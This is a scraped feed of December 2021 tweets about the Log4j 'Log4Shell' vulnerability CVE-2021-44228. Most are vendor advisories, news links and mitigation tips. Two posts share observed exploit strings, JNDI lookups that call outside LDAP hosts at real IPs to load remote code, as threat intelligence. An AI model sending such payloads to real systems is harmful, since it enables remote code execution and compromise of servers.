2021-12-16 22:21:28Example CVE-2021-44228 payload: ${jndi:ldap://5.104.126.146:49165/a} Paths targeted: /api/cluster/security/authori… https://t.co/g0pgDi6IUF https://twitter.com/i/web/status/1471602248513835008bad_packets
2021-12-16 21:32:47Humans were meant to live in caves and hunt bears with sticks not lose sleep over CVE-2021-44228eat_paintchips
2021-12-16 21:32:09Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/EPiJ4L3PbD https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/krulewitch
2021-12-16 21:31:12Current CVEs related to Log4J -- CVE-2021-44228 (Original vulnerability - Fixed with update Log4j 2.15.0) CVE-2021-… https://t.co/cOV9zCJZTz https://twitter.com/i/web/status/1471592465731780609uncl3dumby
2021-12-16 21:30:35Son of a... Atlassian updated their CVE-2021-44228 Advisory. If you run Bitbucket Server or DC, pay attention. https://t.co/nz65K3ZYRa https://buff.ly/3pVOfg4theJiraguy
2021-12-16 21:22:58The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/Ex8m057thE https://twitter.com/i/web/status/1471590762618007565simonryoung1
2021-12-16 21:22:35CVE-2021-44228 Apache Log4j 2 に対するマイクロソフトの対応 https://t.co/rMe23EieCj https://msrc-blog.microsoft.com/2021/12/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/AkibaWalker1
2021-12-16 21:14:12Apache Log4j の脆弱性 (CVE-2021-44228) における弊社製品への影響について(2021/12/13現在) https://t.co/vZTizq59PU https://arcserve.txt-nifty.com/blog/2021/12/post-044f95.htmlArcserve_jp
2021-12-16 21:13:52Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/t0nyy4TeGs https://twitter.com/i/web/status/1471585997628620804torsity_intel
2021-12-16 21:13:03Solar, exploiting log4j Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the su… https://t.co/03GithEF4D https://twitter.com/i/web/status/1471586130181066753N37I2
2021-12-16 21:11:55Support Spotlight: CVE-2021-44228 for log4j and what it means for #SAPBusinessOne https://t.co/ofP7yF6X5Q https://blogs.sap.com/2021/12/15/support-spotlight-cve-2021-44228-for-log4j-and-what-it-means-for-sap-business-one/DariusHeydarian
2021-12-16 21:11:22#ApacheSling advisory regarding CVE-2021-44228 and LOGBACK-1591 https://t.co/sW5eSmGirm https://sling.apache.org/security/log4shell.htmlrombert
2021-12-16 21:01:10Critical Log4Shell (Apache Log4j) Zero-Day Attack Analysis (CVE-2021-44228) https://t.co/TJ8pmimubJ https://buff.ly/3oWQTTGFookHwa
2021-12-16 21:00:32DSA-2021-272: Dell PowerFlex Security Update for Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)… https://t.co/W8ikyKRv7M https://twitter.com/i/web/status/1471585677015932929itzikr
2021-12-16 20:56:02Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/vLX00GRSEV https://twitter.com/i/web/status/1471581911160016898Sociabilidad
2021-12-16 20:55:43Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de Log4j que afectan a millones de dis… https://t.co/CQtFYBayoR https://twitter.com/i/web/status/1471581920140029953AcooEdi
2021-12-16 20:43:34@TheIronMonk3 "mining family m8220" is one of the top current exploiters of CVE-2021-44228 (among others) and this is entirely predictable.AkiretaHK
2021-12-16 20:32:04Log4shell - Why did CVE-2021-44228 set the Internet on Fire? https://t.co/eNDfPN4pgL @sonatype https://bit.ly/3pT9BuEthenewstack
2021-12-16 20:30:46Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/ID5pO3Npwu https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/n0ipr0cs
2021-12-16 20:30:32FYI, The CPE data for the #Log4J (CVE-2021-44228) just got updated. https://t.co/aFi7qSFIFl https://nvd.nist.gov/vuln/detail/CVE-2021-44228JGamblin
2021-12-16 20:18:31#log4j be like DJ Khaled !!! CVE-2021-44228 , CVE-2021-45046 aaaand CVE-2021-4104 ! https://t.co/sqdvuq42Cxsagardhanrale
2021-12-16 20:17:57⚠️Updated 10/16/21 for CVE-2021-45046⚠️ OpenNMS Products Affected by Apache Log4j Vulnerability CVE-2021-44228… https://t.co/fdRi0Rmv1A https://twitter.com/i/web/status/1471571471738753025opennms
2021-12-16 20:15:29Example CVE-2021-44228 payload: ${jndi:ldap://31.131.16.127:1389/Exploit} Source IP: 89.249.63.3 (🇷🇺/🇺🇿)* ________… https://t.co/mBwcc6wF0r https://twitter.com/i/web/status/1471571875616595968bad_packets
2021-12-16 20:10:49#HRtechVendors #Workday Workday Response on CVE-2021-44228 Apache Log4j https://t.co/3vc35bYqDV https://t.co/17AUiEQdaR http://dlvr.it/SFWK1Ghrtechfeed
2021-12-16 20:03:57GitHub’s response to Apache #Log4j vulnerability CVE-2021-44228 aka #Log4Shell describes situation with… https://t.co/TqJt4sunTA https://twitter.com/i/web/status/1471568469053300739ArtyomSinitsyn
2021-12-16 19:52:39Tableau Reader 2021 version 21.4.1356 contains updates to Log4J 2.15.0 to mitigate against CVE-2021-44228: https://t.co/eiGhrLbjYC https://www.tableau.com/support/releases/desktop/2021.4.1rovabu
2021-12-16 19:51:40Conheça todos os detalhes da vulnerabilidade CVE-2021-44228, uma falha zero-day encontrada na Apache Log4j, e por q… https://t.co/sV4PCeNmJi https://twitter.com/i/web/status/1471566681071829004VaultOne
2021-12-16 19:44:55Citrix Security Advisory for Apache CVE-2021-44228 and CVE-2021-45046 | https://t.co/A6eXrAWP9a https://support.citrix.com/article/CTX335705ThomasPreischl
2021-12-16 19:44:47Details of CVE-2021-44228 &amp; CVE-2021-45046, the two new Log4j vulnerabilities affecting millions of devices https://t.co/R5MlmIr6iK https://ift.tt/3yxDcgOAlexaGm33043450
2021-12-16 19:44:41By now we have all probably heard enough about the Log4j zero-day flaw (CVE-2021-44228), right? What you probably… https://t.co/ijXG2r9QkU https://twitter.com/i/web/status/1471564022340222977fletch_ai
2021-12-16 19:40:36@Austin_Chaney Hey there! Please send an email to feedback@slack.com for a response related to CVE-2021-44228. Thanks. 🙏SlackHQ
2021-12-16 19:40:19Apache Log4j CVE-2021-44228 https://t.co/AYQES5hbxP https://hubs.la/Q010X08W0London_Security
2021-12-16 19:33:41Log4Shell log4j vulnerability (CVE-2021-44228 / CVE-2021-45046) - cheat-sheet reference guide https://t.co/ikusLjfdRV https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/ICS_Mikko
2021-12-16 19:23:33.@TimInTech with #SynopsysCyRC explains CVE-2021-44228 "Logshell" vulnerability and its impact on vulnerable softwa… https://t.co/vC5XiS4q5C https://twitter.com/i/web/status/1471558851132489731SW_Integrity
2021-12-16 19:22:58Ericom Software products and the Log4Shell Exploit – CVE-2021-44228 - Security Boulevard https://t.co/mJlrJVumUD https://securityboulevard.com/2021/12/ericom-software-products-and-the-log4shell-exploit-cve-2021-44228/accrete
2021-12-16 19:20:17Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/rrNxscOhpi https://dy.si/51Ndbstingray92
2021-12-16 19:12:52Sample list of #Log4j (CVE-2021-44228) payloads observed in the wild - check out our updated blog with new… https://t.co/r52bSAzRVk https://twitter.com/i/web/status/1471556081453256715GreyNoiseIO
2021-12-16 19:11:08Guidance for #preventing, #detecting, and #hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/33pwly6tMb https://lnkd.in/db2GK4gglgomezperu
2021-12-16 19:10:19Ahora gracias al CVE-2021-44228 (Log4j) en Twitter ya no se puede buscar strings que contengan ${jndi: 😳camilo_verav
2021-12-16 19:00:47The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/cEqcSFzD5G https://twitter.com/i/web/status/1471555075797655553RTocaxelli
2021-12-16 18:57:40https://t.co/IiuK294Onl #intezer #log4j #CVE-2021-44228 https://github.com/intezer/log4jscan/blob/main/log4jscan.shc3yhuncamli
2021-12-16 18:53:27ApacheLog4j の脆弱性(CVE-2021-44228)を悪用する実証コードも公開 - エキサイト https://t.co/dLCmjJBDoc https://t.co/UspJ2OnBnI http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-17%2003%3A40 https://www.excite.co.jp/news/article/Scannetsecurity_46827/sec_trend
2021-12-16 18:53:22クラウドソース・セキュリティテストのSynack、CVE-2021-44228(log4j) へのお客様支援を緊急 ... https://t.co/dLCmjJBDoc https://t.co/IIRWL2ruBn http://izumino.jp/Security/sec_trend.cgi?ref=tw&ref_date=2021-12-17%2003%3A40 https://prtimes.jp/main/html/rd/p/000000005.000086685.htmlsec_trend
2021-12-16 18:53:16Update on Apache #Log4j #log4shell CVE-2021-44228 exploit activity - we’re seeing a decrease in the number of uniqu… https://t.co/F6LV7Cltqi https://twitter.com/i/web/status/1471550893912772613GreyNoiseIO
2021-12-16 18:41:36The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/JuYSl3CbBW https://twitter.com/i/web/status/1471548608168304640velez1066
2021-12-16 18:41:04CVE-2021-44228 #vulnerability in #Apache #Log4j library https://t.co/gI41tE9Z9a http://fuhs.eu/1f7yHfuhs
2021-12-16 18:40:25Update on Apache #Log4j #log4shell CVE-2021-44228 exploit activity - we’re seeing a decrease in the number of uniqu… https://t.co/r1hTspyERf https://twitter.com/i/web/status/1471549800378077188GreyNoiseIO
2021-12-16 18:32:02Est-ce que tout le monde a bien patché sa vulnérabilité CVE-2021-44228 ?_not_101
2021-12-16 18:31:55CVE-2021-44228 https://t.co/NLm0RVgchG #HarsiaInfo https://har-sia.info/CVE-2021-44228.htmlHar_sia
2021-12-16 18:31:26Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued https://t.co/uJ807Qpm20 https://bit.ly/3scA5Kqcompsolv
2021-12-16 18:22:38Ericom Software products and the Log4Shell Exploit – CVE-2021-44228 https://t.co/uZZyJAvnUA https://securityboulevard.com/2021/12/ericom-software-products-and-the-log4shell-exploit-cve-2021-44228/security_inside
2021-12-16 18:22:21Now that everyone was happily patching Log4j (CVE-2021-44228) to v2.15, we find the patch isn't enough, so now intr… https://t.co/91eIBOry9B https://twitter.com/i/web/status/1471544049517703176Bryans140
2021-12-16 18:22:03CRITICAL Sysoft Security Advisory – CVE-2021-44228 https://t.co/wcCshForBc https://t.co/LbmudyAQgh http://dlvr.it/SFVzTySysoft_MSP
2021-12-16 18:21:32@SlackHQ Sorry, CVE-2021-44228 is the correct CVE.Austin_Chaney
2021-12-16 18:13:47OPTO 22 New Blog Important information about Log4Shell/Log4j (CVE-2021-44228) https://t.co/QwAQKOcQYu https://bit.ly/3E1anL84TECIntegration
2021-12-16 18:13:37The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/fdCMmAb1tU https://twitter.com/i/web/status/1471540912962551812velez1066
2021-12-16 18:11:03Important information about Log4Shell/Log4j (CVE-2021-44228) https://t.co/gEpcPrWD2k https://t.co/HlJtOahT5w https://op22.co/3F4FZk6opto22
2021-12-16 18:02:53We started our second research scan for rhe log4j vulnerability (CVE-2021-44228). Following up on the results of th… https://t.co/1iUlWWG4z7 https://twitter.com/i/web/status/1471538654107607053AlphaStrikeLabs
2021-12-16 18:01:28Learn about how to mitigate CVE-2021-44228, the critical vulnerability associated with Log4j, and other threats in… https://t.co/VyoSLSQYPh https://twitter.com/i/web/status/1471539632584208386stratascale
2021-12-16 18:00:31Log4shell o CVE-2021-44228: Vulnerabilidad de seguridad que afecta directamente a Apache (Servidor HTTP número uno… https://t.co/PrcZVVLDcD https://twitter.com/i/web/status/1471540189327728648KIPPEO_Tech
2021-12-16 17:51:37#Cibersegruidad #infosec #seguridad Detalles de CVE-2021-44228 y CVE-2021-45046, las dos nuevas vulnerabilidades de… https://t.co/JBgRV37TWv https://twitter.com/i/web/status/1471537349209165827iicsorg
2021-12-16 17:51:18#infosec #cybersecurity #hacking #security Details of CVE-2021-44228 &amp; CVE-2021-45046, the two new Log4j vulnerabil… https://t.co/qwYiETqMEm https://twitter.com/i/web/status/1471537560220356609iicsorg
2021-12-16 17:40:35#CVE-2021-44228 (#log4j) modelled as a #Mitre #STIX 2.1 Bundle. Download the entire bundle here:… https://t.co/XIiDsGQvFb https://twitter.com/i/web/status/1471535218741837825SignalsCorps
2021-12-16 17:30:35eXist-db 4.8.0 and 5.3.1 have just been released to address the “log4jshell” security issue (CVE-2021-44228). You c… https://t.co/Ev6Ef8uUOQ https://twitter.com/i/web/status/1471532171894611973existdb
2021-12-16 17:22:12The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/xUrVOj9v7t https://twitter.com/i/web/status/1471530314711375873CaraWainwright7
2021-12-16 17:15:52The recent Log4j vulnerability, CVE-2021-44228, is raising widespread concerns. @JuniperNetworks Threat Labs assess… https://t.co/DZ8gThHOem https://twitter.com/i/web/status/1471525536023330823EvanKirstel
2021-12-16 17:15:26Lumen Touch is aware of the CVE-2021-44228 Log4j vulnerability and do not use Java or the Log4j library, and as suc… https://t.co/ZlVVO8QS8z https://twitter.com/i/web/status/1471525660636196868LumenTouch
2021-12-16 17:14:55Trustwave is actively responding to Log4j vulnerabilities CVE-2021-44228 and CVE-2021-45046. We are regularly updat… https://t.co/XxXMTYeDXU https://twitter.com/i/web/status/1471525850742931465DougOlenick
2021-12-16 17:14:31Log4j Sec Vulnerabilities CVE-2021-44228 – Mitigation Strategies for TAS Ops https://t.co/g37YmgUKil https://dy.si/Rb4zitanwk3
2021-12-16 17:12:47The recent Log4j vulnerability, CVE-2021-44228, is raising widespread concerns. @JuniperNetworks Threat Labs assess… https://t.co/3LJPn54QKV https://twitter.com/i/web/status/1471526798303313926BCstrat
2021-12-16 17:03:30Quality Clouds Security Communication: Regarding the Log4j zero-day vulnerability (CVE-2021-44228), in Quality Clou… https://t.co/TVhEqfP4DN https://twitter.com/i/web/status/1471523223934279680QualityClouds
2021-12-16 17:03:14Are you Log4J vulnerability proof? CVE-2021-44228 https://t.co/L1Sof4zWKI https://lnkd.in/gW_xPw_bRainerKaru
2021-12-16 17:02:41(大体)全てを .NET で固めたおかげで、CVE-2021-44228/45046 の影響もなく平和に過ごせてるmst8000
2021-12-16 17:02:12Guidance for reducing Apache Log4j security vulnerability (CVE-2021-44228) risk with Citrix WAF https://t.co/FWt3h5ED4r https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/infoseclex
2021-12-16 17:01:34"It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default c… https://t.co/EYevH67BlI https://twitter.com/i/web/status/1471524006993874945PeterCorless
2021-12-16 16:56:23Oracle EBS R12.2 AD/TXK Specific log4J fix CVE-2021-44228 https://t.co/ghcN2Q6sNQ https://jhlui1.wordpress.com/2021/12/16/oracle-ebs-r12-2-fix-log4j-vulnerability-in-ad-txk-delta-12-13/jhlui1
2021-12-16 16:47:14log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228 https://t.co/N3d1jc8pwS https://www.itsecuritynews.info/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228-2/IT_securitynews
2021-12-16 16:44:11[Microsoft] Guía orientación para prevenir, detectar y buscar la explotación de CVE-2021-44228 Log4j 2 🔐 Ataques R… https://t.co/uXXsYiLQLS https://twitter.com/i/web/status/1471519488478748675elhackernet
2021-12-16 16:41:06Apache-Log4j-8211-Technical-Analysis-of-Critical-Remote-Code-Execution-Vulnerability-Tracked-as-CVE-2021-44228 'https://t.co/SZYelO8Qdf' https://www.cyfirma.com/outofband/apache-log4j-technical-analysis-of-critical-remote-code-execution-vulnerability-tracked-as-cve-2021-44228/venky4a
2021-12-16 16:40:19CVE-2021-44228: 💥 Meanwhile, 6 years ago (!!!!) : @pwntester talking about JNDI/LDAP manipulation https://t.co/VrEQ3OPV7B https://www.youtube.com/watch?v=Y8a5nB-vy78&ab_channel=BlackHatPaulWebSec
2021-12-16 16:33:52Log4j Sec Vulnerabilities CVE-2021-44228 – Mitigation Strategies for TAS Ops https://t.co/lpFCa9A2gt https://dy.si/FC2Whcyy_ran
2021-12-16 16:26:25DataPower does not use log4j2, so is not affected by CVE-2021-44228 log4j2 vulnerabilities. Tech note:… https://t.co/Tv4TNZSK0N https://twitter.com/i/web/status/1471513040717635592CapnAjax
2021-12-16 16:25:45CVE-2021-44228: The Log4Shell Vulnerability https://t.co/QHQWIksGna https://securityboulevard.com/2021/12/cve-2021-44228-the-log4shell-vulnerability/security_inside
2021-12-16 16:20:50Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について | 警察庁 @police https://t.co/rWHvdMLIRq https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlKaiz_JP
2021-12-16 16:19:31📢 Após várias perguntas sobre a vulnerabilidade Log4j recentemente encontrada (CVE-2021-44228), também conhecida co… https://t.co/h0im4g0b5i https://twitter.com/i/web/status/1471511070086864907wisenet_br
2021-12-16 16:17:37CRITICAL UPDATE to Log4j 2 VULNERABILITY. Some of the Webswing versions might be vulnerable to CVE-2021-44228. Fixe… https://t.co/uJKn6MEMZA https://twitter.com/i/web/status/1471511663119454222Webswing_org
2021-12-16 16:00:18📢 Tras numerosas consultas relacionadas con la vulnerabilidad Log4j recientemente encontrada (CVE-2021-44228), tamb… https://t.co/MbCQ0wHyEt https://twitter.com/i/web/status/1471510422910115840Hanwha_Latam
2021-12-16 15:55:10@navneet066 2.15.0 does address CVE-2021-44228 by disabling the JNDI lookup behaviour by default. The log4j2.format… https://t.co/TaTdqJq4Ud https://twitter.com/i/web/status/1471506214320103444strimziio
2021-12-16 15:54:36An update on the Apache Log4j CVE-2021-44228 vulnerability https://t.co/OC9AOyQsAQ https://ibm.biz/BdfTiKL2clrogers
2021-12-16 15:53:13NVIDIA LOG4J JAVA VULNERABILITY (CVE-2021-44228) FOR LEGACY VGPU SOFTWARE LICENSE SERVER https://t.co/T5jZq3WcoD https://enterprise-support.nvidia.com/s/article/Log4j-Java-Vulnerability-CVE-2021-44228-for-vGPU-Legacy-License-ServerGuilbaultFrank
2021-12-16 15:45:30Minecraft patched CVE-2021-44228 in version 1.18.1 by setting log4j2.formatMsgNoLookups=true in the logger configurationmhultdin
2021-12-16 15:44:59Qu’est-il possible de faire pour colmater / endiguer la vulnérabilité Log4j #Log4Shell CVE-2021-44228 Via… https://t.co/JFSCPrfSo0 https://twitter.com/i/web/status/1471503341444206593argevise
2021-12-16 15:44:29CVE-2021-44228 Log4j 2 vulnerability with details on ransomware attacks! https://t.co/eOs9BAUIOj https://twitter.com/msftsecintel/status/1471307845794779137jessefmoore
2021-12-16 15:41:17CVE-2021-44228 – Impact of Log4j vulnerability on SAP BusinessObjects https://t.co/37pYfBxG2H https://ift.tt/3260iiAabap4sap
2021-12-16 15:40:59Qu’est-il possible de faire pour colmater la vulnérabilité Log4j #Log4Shell CVE-2021-44228 Via @paul_infosec… https://t.co/L3VEoVMQlM https://twitter.com/i/web/status/1471504631398240256argevise
2021-12-16 15:40:41[CVE-2021-44228] Central Security Note for Remote Code Execution vulnerability associated with Apache Log4j 2 compo… https://t.co/9O62YGNkML https://twitter.com/i/web/status/1471504672506593291marcfbe
2021-12-16 15:35:17https://t.co/vbDL9rB5ze Centralized list of Storage and Backup systems affected by zero-day log4shell vulnerability (CVE-2021-44228) https://cybersec.continuitysoftware.com/s/centralized-list-of-storage-and-backup-systems-affected-by-zero-day-log4shell-vulnerability-cve-2021-44228-2571/1BentleyAudrey
2021-12-16 15:33:11[Arca Noae] Apache Log4j vulnerability (CVE-2021-44228) https://t.co/fw4eVqBq8h https://ift.tt/3m9LcQkOS2World
2021-12-16 15:30:34CVE-2021-44228だけじゃなくて、CVE-2021-4104もきちんと追えよ JP CERTはこっちも注意喚起してくれratto_
2021-12-16 15:30:10I know of some companies that didn't take mitigation actions on CVE-2021-44228 late last week. Those said companie… https://t.co/WkPP4lQzog https://twitter.com/i/web/status/1471498829501403138cryptostrat_
2021-12-16 15:27:02更新:Apache Log4j の脆弱性対策について(CVE-2021-44228):IPA 独立行政法人 情報処理推進機構 https://t.co/gAQfvNtcw6 https://www.ipa.go.jp/security/ciadr/vul/alert20211213.htmlmiki158s
2021-12-16 15:16:59.@LaceworkLabs has identified opportunistic attackers leveraging the recent #Log4J vulnerability (CVE-2021-44228).… https://t.co/ctWjZ47cXH https://twitter.com/i/web/status/1471495368860786689sanderprooijen
2021-12-16 15:11:19Minecraft patched CVE-2021-44228 in version 1.18.1 by setting formatMsgNoLookup to "true" in the logger configurationmhultdin
2021-12-16 15:10:57Log4j (CVE-2021-44228) Vulnerability Explained with Demo in 4 MINUTES! - https://t.co/H3qzzdvsCg - #CyberSecurity… https://t.co/wiGBfR5yyG https://www.youtube.com/watch?v=d-XsHBAJ2z8 https://twitter.com/i/web/status/1471497452603674658JonGoodCyber
2021-12-16 15:10:38Investigating CVE-2021-44228 Log4Shell Vulnerability https://t.co/3mrk1aEB6X https://dy.si/L8uT2umacboyvictor
2021-12-16 15:00:52CVE-2021-44228 – Impact of Log4j vulnerability on SAP BusinessObjects https://t.co/nuLp2mWdJp #itpfed https://t.co/38xZmXuAJm https://blogs.sap.com/2021/12/16/cve-2021-44228-impact-of-log4j-vulnerability-on-sap-businessobjects/?utm_source=dlvr.it&utm_medium=twitteritpfed
2021-12-16 14:58:33Log4J: CVE-2021-44228 Ops: Investigated all of the servers, patched most of them, answered thousands of worried em… https://t.co/GCTfmtfKcx https://twitter.com/i/web/status/1471491544062455813ATornblad
2021-12-16 14:55:36CVE-2021-44228 Log4jの脆弱性のAWS環境への影響 - Qiita https://t.co/aB6iK9fF8N https://qiita.com/tsukamoto/items/858f2bb863e75d4225c4sizuhiko
2021-12-16 14:52:59🚨 NEW: CVE-2021-45046 🚨 It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete i… https://t.co/d8iANQbQlR https://twitter.com/i/web/status/1471492699328901124threatintelctr
2021-12-16 14:50:53🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/ZKqwzpc7Zq https://twitter.com/i/web/status/1471492699500867594threatintelctr
2021-12-16 14:43:54CVE-2021-44228_scanner https://t.co/zccIFpYZY2 https://github.com/CERTCC/CVE-2021-44228_scannersteiner254
2021-12-16 14:42:58Apache Log4jに存在する RCE 脆弱性(CVE-2021-44228)についての検証レポート | NTTデータ先端技術株式会社 https://t.co/I6Yol7mjhm https://www.intellilink.co.jp/column/vulner/2021/121500.aspxzimei_no_ri
2021-12-16 14:42:12「Apache Log4j」での遠隔からの任意コード実行の深刻な脆弱性(CVE-2021-44228)について、クラウド型WAF「BLUE Sphere」が対策完了を発表 https://t.co/uEdvt4F3j8 @thebridge_jpより https://thebridge.jp/prtimes/422797zimei_no_ri
2021-12-16 14:41:06Apache Log4jの任意のコード実行の脆弱性(CVE-2021-44228)に関する注意喚起 https://t.co/MfGexa7KnB @jpcert https://www.jpcert.or.jp/at/2021/at210050.htmlzimei_no_ri
2021-12-16 14:35:34Regarding the log4jshell vulnerability (CVE-2021-44228) — NimbleText does not contain log4j and is not affected by… https://t.co/GAwEsGn6ak https://twitter.com/i/web/status/1471485322831622148nimbletext
2021-12-16 14:35:20Is there any way that Maven can warn one about such vulnerabilities? I see no CVE-2021-44228 warning, only "There i… https://t.co/21nd7riBfv https://twitter.com/i/web/status/1471485347569750019howlger
2021-12-16 14:34:10Un audit d’impact à propos de la CVE-2021-44228 « #Log4shell », nous confirme qu'elle est non applicable aux produi… https://t.co/bWw3NbkTos https://twitter.com/i/web/status/1471485747320528903tehtris
2021-12-16 14:30:47Following the disclosure of the Apache Log4j 2 (CVE-2021-44228) vulnerability, we would like to reassure all of our… https://t.co/1Rj1I6Z1X2 https://twitter.com/i/web/status/1471487342003240960WinMan_ERP
2021-12-16 14:23:13"Log4jの脆弱性CVE-2021-44228に対するGitHubの対応について" https://t.co/SVyL4Ff5C9 https://github.blog/2021-12-13-githubs-response-to-log4j-vulnerability-cve-2021-44228/kabukawa
2021-12-16 14:22:47Watch SecPod experts demonstrate detecting Apache Log4j Vulnerability CVE-2021-44228 using SanerNow CyberHygiene Pl… https://t.co/kmM6qNsp1Z https://twitter.com/i/web/status/1471483565292486658SecPod
2021-12-16 14:20:46🚨 NEW: CVE-2021-44228 🚨 Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in conf… https://t.co/N0UGAqL3Sx https://twitter.com/i/web/status/1471485149493796868threatintelctr
2021-12-16 14:19:15UPDATED: Cybereason Vaccine Prevents Exploitation of Apache Log4Shell Vulnerabilities (CVE-2021-44228 and CVE-2021-… https://t.co/UNilHLPuSR https://twitter.com/i/web/status/1471476579729616898BlakOrkidGal
2021-12-16 14:15:14アクロニス・ジャパン株式会社 Apache Log4jの脆弱性(CVE-2021-44228)の影響について https://t.co/GWWIoXH8eH https://news.fresheye.com/dreamnews/article/dn-0000250374.htmlzimei_no_ri
2021-12-16 14:14:51Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog https://t.co/aRF9xjpn49 https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/RadioFranCoxion
2021-12-16 14:14:15Log4jで話題になったWAFの回避/難読化とは何か https://t.co/zNV4WsEmnA https://t.co/IDvZnjCCir はじめに 2021年12月に発見されたLog4jのCVE-2021-44228は… https://t.co/epOiz6nYAh https://www.scutum.jp/information/waf_tech_blog/2021/12/waf-blog-081.html https://b.hatena.ne.jp/entry/s/www.scutum.jp/information/waf_tech_blog/2021/12/waf-blog-081.html https://twitter.com/i/web/status/1471480755318824964hatebu100
2021-12-16 14:14:02Es gibt viel Aufmerksamkeit für die schwerwiegende #Sicherheitslücke im Logging-Tool #Log4j (CVE-2021-44228). Wir m… https://t.co/lSOtJRTUrl https://twitter.com/i/web/status/1471480890773717001Axis_DACH
2021-12-16 14:13:04Critical Alert issued by the National Cyber Security Centre as the newly detected vulnerability, CVE-2021-44228, na… https://t.co/E8ZHDMJTqw https://twitter.com/i/web/status/1471481110098030600we_are_ha
2021-12-16 14:10:50Openprovider marks safe from CVE-2021-44228 vulnerability in #Log4j: https://t.co/w2UbAZK3vl #Log4Shell https://t.co/gcnOyKED3V https://openprovider.com/blog/openprovider-response-to-the-cve-2021-44228-vulnerability-in-apache-log4j/openprovider
2021-12-16 14:02:50The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/YadHOulnoF https://twitter.com/i/web/status/1471477846749155328KellyStefaniGo1
2021-12-16 14:02:38The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/TzBX0LbQWR https://twitter.com/i/web/status/1471478034750398469KellyStefaniGo1
2021-12-16 14:01:22Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation https://t.co/yNGiaoY6Rt https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/KajaCiglic
2021-12-16 14:00:13Top 3 trending CVEs on Twitter Past 24 hrs: CVE-2021-44228: 5.5M (audience size) CVE-2021-45046: 3.5M CVE-2021-208… https://t.co/d3neZlWhJs https://twitter.com/i/web/status/1471480237775114242CVEtrends
2021-12-16 13:54:48The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/V77LNtxiwp https://twitter.com/i/web/status/1471475672778477569velez1066
2021-12-16 13:54:39The @TrendMicroRSRCH team is actively tracking #Log4Shell, aka CVE-2021-44228. This critical vulnerability is affec… https://t.co/K5crdaVMzn https://twitter.com/i/web/status/1471475780232400902velez1066
2021-12-16 13:54:30Using NSX IDS/IPS to protect against CVE-2021-44228 Log4Shell Vulnerability https://t.co/LjGfU7jv8l https://dy.si/HFvHCG2scandaletti
2021-12-16 13:52:55java: Javaライブラリ「Apache Log4j」の脆弱性(CVE-2021-44228)を標的とした攻撃の観測について | 警察庁 @police https://t.co/GrTspTY1ML https://www.npa.go.jp/cyberpolice/important/2021/202112141.htmlRSS_hateb_l_Roy
2021-12-16 13:51:54AutoCADベースのソフトウェアとオートデスクライセンスは、Log4jのゼロ日の欠陥による影響を受けますか? CVE-2021-44228 https://t.co/zGvSZ5Clu4 #Insight https://knowledge.autodesk.com/ja/support/insight/learn-explore/caas/sfdcarticles/sfdcarticles/JPN/CVE-2021-44228.htmlzimei_no_ri
2021-12-16 13:50:32Log4J(CVE-2021-44228)脆弱性に関するBoxの見解 https://t.co/2Djd2RnJGs https://www.boxsquare.jp/blog/log4j-vulnerabilityzimei_no_ri
2021-12-16 13:50:12@arstechnica @dangoodin001 CVE-2021-45046 is a CVSS 3.7, a far cry from the CVSS 10 score of CVE-2021-44228. The co… https://t.co/4DjgseqoJ4 https://twitter.com/i/web/status/1471477672303857670erickolb
